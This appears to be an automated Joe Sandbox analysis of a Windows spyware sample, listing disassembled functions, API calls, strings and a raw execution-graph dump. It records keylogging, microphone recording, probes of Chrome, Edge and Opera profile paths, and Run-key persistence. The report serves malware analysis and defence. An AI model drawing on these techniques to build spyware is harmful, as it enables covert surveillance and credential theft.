                                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                • DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                                                                • _free.LIBCMT ref: 00449B4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnter_free
                                                                                • String ID: (3
                                                                                • API String ID: 1836352639-2570504824
                                                                                • Opcode ID: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                                                                • Instruction ID: 49f98359192604db3700e7d46e2ee0879056decf89b11c46129577f8840becb7
                                                                                • Opcode Fuzzy Hash: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                                                                • Instruction Fuzzy Hash: C3115E31500214DFEB20DFA8E846B5D73B0FB04724F10455AE8599B2E6CBBCEC429B0D
                                                                                APIs
                                                                                • waveInPrepareHeader.WINMM(003191F8,00000020,?), ref: 00401849
                                                                                • waveInAddBuffer.WINMM(003191F8,00000020), ref: 0040185F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                • String ID: XMG
                                                                                • API String ID: 2315374483-813777761
                                                                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                APIs
                                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocaleValid
                                                                                • String ID: IsValidLocaleName$kKD
                                                                                • API String ID: 1901932003-3269126172
                                                                                • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                • API String ID: 1174141254-4188645398
                                                                                • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                • API String ID: 1174141254-2800177040
                                                                                • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                                • API String ID: 1174141254-1629609700
                                                                                • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: xX4
                                                                                • API String ID: 269201875-4134912787
                                                                                • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                                                                • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                                                                APIs
                                                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                • String ID: [AltL]$[AltR]
                                                                                • API String ID: 2738857842-2658077756
                                                                                • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShell
                                                                                • String ID: !D@$open
                                                                                • API String ID: 587946157-1586967515
                                                                                • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                APIs
                                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: State
                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                • API String ID: 1649606143-2446555240
                                                                                • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                APIs
                                                                                  • Part of subcall function 00449ADC: DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                                                                  • Part of subcall function 00449ADC: _free.LIBCMT ref: 00449B4C
                                                                                  • Part of subcall function 00449B7C: _free.LIBCMT ref: 00449B9E
                                                                                • DeleteCriticalSection.KERNEL32(0033E808), ref: 0043C241
                                                                                • _free.LIBCMT ref: 0043C255
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$CriticalDeleteSection
                                                                                • String ID: (3
                                                                                • API String ID: 1906768660-2570504824
                                                                                • Opcode ID: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                                                                • Instruction ID: 53b3c8965ed62865b06495ab0c988fe80dbb580c75aaeb32feec7d00177b517a
                                                                                • Opcode Fuzzy Hash: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                                                                • Instruction Fuzzy Hash: F8E04F328145208FEB71BB69FD4595A73E4EB4D325B12086FF80DA3165CAADAC809B4D
                                                                                APIs
                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Init_thread_footer__onexit
                                                                                • String ID: ,kG$0kG
                                                                                • API String ID: 1881088180-2015055088
                                                                                • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                APIs
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteOpenValue
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                • API String ID: 2654517830-1051519024
                                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteDirectoryFileRemove
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 3325800564-4028850238
                                                                                • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                APIs
                                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 1872346434-4028850238
                                                                                • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                APIs
                                                                                • GetLastInputInfo.USER32(NG), ref: 0041BB87
                                                                                • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountInfoInputLastTick
                                                                                • String ID: NG
                                                                                • API String ID: 3478931382-1651712548
                                                                                • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                                                • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                • GetLastError.KERNEL32 ref: 00440D85
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1717984340-0
                                                                                • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                APIs
                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411F2B), ref: 00411BC7
                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00411F2B), ref: 00411C93
                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastRead
                                                                                • String ID:
                                                                                • API String ID: 4100373531-0
                                                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                Execution Graph

                                                                                Execution Coverage:5.4%
                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1990
                                                                                Total number of Limit Nodes:56
                                                                                execution_graph: serialized node/edge data of the interactive execution graph (entry node 37716 at 4466f4; nodes list addresses and called APIs, edges are written as source->target); the full listing is omitted here.
408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 ??3@YAXPAX 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf ??3@YAXPAX 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab ??3@YAXPAX ??3@YAXPAX 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 
38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab ??3@YAXPAX ??3@YAXPAX 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 ??3@YAXPAX 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 ??3@YAXPAX 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc 
